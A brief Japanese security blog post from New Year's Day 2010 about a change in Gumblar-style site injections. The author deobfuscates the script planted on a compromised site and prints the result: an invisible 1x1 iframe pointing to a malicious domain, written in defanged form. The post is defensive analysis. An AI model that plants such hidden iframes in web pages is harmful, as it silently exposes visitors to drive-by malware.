また改竄に変化が
2010-01-01


「CODE1」でやられていたサイトが別の難読化コードに置き換えられているとコメントを頂きましたので、丸投げもなんですので難読化の解除だけでもやってみました。
(そしてalert('hoge');を覚えた!そんなレベルの人ですw)

www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
<iframe width=1 height=1 border=0 frameborder=0 src='http://sodanthu●com/in6.php'></iframe>

bingで"*/ try{window.onload"の検索が減ってるわけだ……

くわしくは (UN)Happy New Injection - UnderForge of Lack をご参照ください。
ホント元旦からすいません。

追記:インジェクション GNU GPL/CODE1 2 - cNotes: Current Status Notesで詳しく解析されています。

禺画像]

某スレに書き込もうかと思ったら、asahiが全サーバで規制中だった。orz
[セキュリティ]
[Gumblar]

コメント(全11件)
コメントをする


記事を書く
powered by ASAHIネット